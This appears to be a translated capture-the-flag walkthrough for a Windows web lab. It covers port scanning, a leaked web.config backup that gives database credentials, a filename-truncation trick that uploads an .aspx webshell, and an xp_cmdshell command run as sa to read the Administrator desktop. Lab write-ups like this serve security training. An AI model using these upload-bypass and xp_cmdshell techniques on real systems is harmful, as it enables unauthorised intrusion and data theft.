Prepare the environment and open it with VMware, the password is admin123.
Port Scanning#
The firewall is enabled by default, and ping scanning is disabled.
Pay attention to the following ports: database port 1433 and web port 27689.
Web Application#
Access port 27689, the interface is as follows:
Attempted weak password but no success.
Directory Scanning#
Use Yujian for directory scanning.
robots.txt file
Found a backup file web.config.bak, downloaded it and found the database account password from the file.
Database Connection#
Based on the previous port information, the target has port 1433 open. Use Navicat to connect.
Found a key in the database.
Looking for the website's backend password.
Backend Login#
Logged in to the backend with the account password and found a key.
The backend has a file upload function.
Accessing an uploaded file randomly will display an error message with the path shown.
D:\web\upfile\affix\
File Upload#
Upload a normal image file randomly.
In the image above, you can see that the image with number 44 has a file description.
Note: If the file name is too long, the system will truncate it to the first 32 characters, including the system time, as the file name. Please do not use a file name that is too long. We apologize for any inconvenience caused.
You can use the system's truncation function to remove the .jpg extension from the uploaded file. According to the above prompt, the truncation will start at 32 characters. Truncate the content to 32 characters.
The file name format is 18-digit number
+ -
+ image name
+ image extension
. We need to upload an .aspx file, so besides the image name, we have 24 characters, and we need 8 more characters. This means the image name needs to be 8 characters.
Prepare the following files:
The uploaded file will look like this:
Webshell Connection#
Concatenate the webshell URL based on the website path.
D:\web\upfile\affix\
http://192.168.10.22:27689/upfile/affix/638252986630625000-88888888.aspx
View the current user's permissions, which are normal user permissions.
At the same time, in the website's web directory, you can find the second key.
The last key is on the desktop in the administrator directory, but we don't have permission to access the contents of this directory at the moment.
Database Connection to Retrieve Key as sa#
Continue to search for the website's configuration file and find the file D:/web/web.config.bak.2017-12-12
containing the sa account for the database.
Log in to the database using the sa account, and then use xp_cmdshell to view the files, right?
use master;
exec master..xp_cmdshell 'dir "c:\Documents and Settings\Administrator\桌面\"'
Obtained the last key.
Environment Link#
Link: https://pan.baidu.com/s/140cLWvmzs0CauuA_JOro5A
Password: 6666